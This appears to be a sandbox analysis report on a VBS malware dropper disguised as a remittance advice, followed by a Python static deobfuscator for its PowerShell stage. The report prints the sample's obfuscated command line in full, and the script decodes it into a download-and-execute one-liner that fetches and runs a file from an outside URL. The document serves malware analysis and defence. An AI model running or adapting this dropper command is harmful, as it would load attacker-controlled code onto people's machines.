Analysis

max time kernel: 8s
max time network: 46s
platform: windows7_x64
resource: win7v20210410
submitted: 23-07-2021 17:12

Static task: static1

Behavioral task: behavioral1
Sample: Remittance_Advice.vbs
Resource: win7v20210410 (windows7_x64)
0 signatures, 0 seconds

Behavioral task: behavioral2
Sample: Remittance_Advice.vbs
Resource: win10v20210410 (windows10_x64)
0 signatures, 0 seconds
General

Target: Remittance_Advice.vbs
Size: 875B
MD5: fc4a8faf57b167de212a02466d0f5435
SHA1: 8b83c8dad3b1168c37729b8c6551e7ac4d0071af
SHA256: 84199bedc07e09ccb967692a43de715611625dc247ceea48ea2f4a7109bc5287
SHA512: 855874d54ef794939a9c2da096dda06168f34cdb17500d762a4bbdaeb0e5ad687da86791150b83381e3617ff5ff88fb124c7b2d76c5f120b997d91206b7d18f0
Score: 10/10
Malware Config

Extracted
Language: ps1
Deobfuscated
URLs
exe.dropper: https://www.maan2u.com/a/ALL.txt
Signatures

Blocklisted process makes network request (1 IoC)
Processes: powershell.exe (flow 6, pid 852)

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s); the sandbox labels this "likely ransomware behaviour". The report attributes the hit to no specific process and records no file writes anywhere, so treat it as a generic heuristic rather than evidence of encryption activity.

Suspicious behavior: EnumeratesProcesses (2 IoCs)
Processes: powershell.exe (pid 852), powershell.exe (pid 852)

Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes: powershell.exe (pid 852), Token: SeDebugPrivilege

Suspicious use of WriteProcessMemory (3 IoCs)
Processes (source pid, source process, target pid, target process):
1088 WScript.exe wrote to memory of 852 powershell.exe
1088 WScript.exe wrote to memory of 852 powershell.exe
1088 WScript.exe wrote to memory of 852 powershell.exe
Processes

WScript.exe (pid 1088), depth 1
  Image: C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Remittance_Advice.vbs"
  - Suspicious use of WriteProcessMemory

  powershell.exe (pid 852), depth 2, child of WScript.exe
    Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TRUMP ='https://www.maan2u.com/a/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

explorer.exe, depth 1
  Image: C:\Windows\explorer.exe
  Command line: "C:\Windows\explorer.exe"
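The PowerShell stage above hides its intent behind string Replace chains, backtick escapes and an IEX built from 'I'+'EX'. The following Python is an added worked example, not part of the sandbox report or its extractor: it statically emulates exactly those constructs (single-quoted literals, .Replace() chains, $variable expansion, backtick escapes, literal concatenation) and recovers the second stage without running PowerShell or touching the network. The function and constant names (analyze, SAMPLE, fold_concat and friends) are this example's own. It assumes Windows PowerShell 5.1 backtick semantics, which is what the win7/win10 sandbox hosts run; the `e (ESC) escape exists only in PowerShell 6+, so `e in the sample is a literal e there.

```python
"""Static deobfuscation of the Replace-chain PowerShell stage recorded for pid 852.

Example code added to illustrate the report; it is not the sandbox's own
extractor.  It emulates only what the sample uses and never executes anything.
"""
import re

# Command line exactly as the report records it for powershell.exe (pid 852).
SAMPLE = (
    "$TRUMP ='https://www.maan2u.com/a/ALL.txt';"
    "$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');"
    "$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');"
    "$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');"
    "&('I'+'EX')($A -Join '')|&('I'+'EX');"
)

# A PowerShell single-quoted literal; '' inside it is an escaped quote.
LITERAL = r"'((?:[^']|'')*)'"
REPLACE_RE = re.compile(r"\.Replace\(" + LITERAL + "," + LITERAL + r"\)")
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*" + LITERAL + r"((?:\.Replace\(" + LITERAL + "," + LITERAL + r"\))*)")
URL_RE = re.compile(r"https?://[^\s'\"()]+")

# Backtick escapes that Windows PowerShell 5.1 turns into control characters.
# `e (ESC) was added in PowerShell 6, so on the 5.1 hosts used here `e is a
# literal 'e'; the other escaped characters in the sample (`E `W `- `c `T) are
# literal in every version.  This assumption is what yields "new-object".
PS_ESCAPES = {"0": "\0", "a": "\a", "b": "\b", "f": "\f", "n": "\n", "r": "\r", "t": "\t", "v": "\v"}


def unquote(lit):
    """Undo the '' quote escape of a single-quoted literal body."""
    return lit.replace("''", "'")


def evaluate_assignments(script):
    """Evaluate every  $name = '...'.Replace('a','b')...  statement.

    .NET String.Replace(string, string) is ordinal, case-sensitive and replaces
    all non-overlapping occurrences left to right, exactly like str.replace.
    """
    env = {}
    for m in ASSIGN_RE.finditer(script):
        name, value, chain = m.group(1), unquote(m.group(2)), m.group(3)
        for old, new in REPLACE_RE.findall(chain):
            value = value.replace(unquote(old), unquote(new))
        env[name] = value
    return env


def strip_backticks(text):
    """Resolve backtick escapes the way the PowerShell tokenizer does."""
    return re.sub(r"`(.)", lambda m: PS_ESCAPES.get(m.group(1), m.group(1)), text)


def expand_variables(text, env):
    """Replace $name with its value as a single-quoted literal (unknown names stay)."""
    return re.sub(r"\$(\w+)",
                  lambda m: "'" + env[m.group(1)] + "'" if m.group(1) in env else m.group(0),
                  text)


def fold_concat(text):
    """Fold 'a'+'b' string concatenation, e.g. &('I'+'EX') -> &('IEX')."""
    pat = re.compile(LITERAL + r"\s*\+\s*" + LITERAL)
    while pat.search(text):
        text = pat.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", text)
    return text


def analyze(script, stage_var="A"):
    """Return the evaluated variables, the decoded stage-2 text and the URLs it carries."""
    env = evaluate_assignments(script)
    # Tokenizer escapes are processed before variables are expanded at run time,
    # so strip backticks first; values pulled from variables are never re-escaped.
    stage2 = expand_variables(strip_backticks(env[stage_var]), env)
    invoker = fold_concat(script[script.index("&("):]) if "&(" in script else ""
    return {"vars": env, "stage2": stage2, "invoker": invoker, "urls": URL_RE.findall(stage2)}


if __name__ == "__main__":
    result = analyze(SAMPLE)
    for name, value in result["vars"].items():
        print(f"${name} = {value!r}")
    print("stage 2:", result["stage2"])
    print("invoker:", result["invoker"])
    print("urls:   ", result["urls"])
```

Run against the recorded command line this yields $B = Net.WebClient, $CC = DownloadString (both in mixed case) and a stage 2 of IEX(New-Object 'Net.WebClient').'DownloadString'('https://www.maan2u.com/a/ALL.txt'), wrapped as &('IEX')($A -Join '')|&('IEX'). In other words the script downloads ALL.txt and executes it twice over, once inside $A and once through the trailing pipe, which is why the extractor classifies the URL as exe.dropper. The emulator deliberately handles only the constructs this sample uses; a variant that switches to double-quoted strings, -replace with regex semantics, or -f formatting needs the corresponding handlers.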
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

memory/852-61-0x0000000000000000-mapping.dmp
memory/852-63-0x0000000002360000-0x0000000002361000-memory.dmp (4KB)
memory/852-64-0x000000001ABF0000-0x000000001ABF1000-memory.dmp (4KB)
memory/852-65-0x0000000002440000-0x0000000002441000-memory.dmp (4KB)
memory/852-66-0x000000001AA80000-0x000000001AA82000-memory.dmp (8KB)
memory/852-67-0x000000001AA84000-0x000000001AA86000-memory.dmp (8KB)
memory/852-68-0x00000000023A0000-0x00000000023A1000-memory.dmp (4KB)
memory/852-70-0x000000001C4E0000-0x000000001C4E1000-memory.dmp (4KB)
memory/1088-60-0x000007FEFC181000-0x000007FEFC183000-memory.dmp (8KB)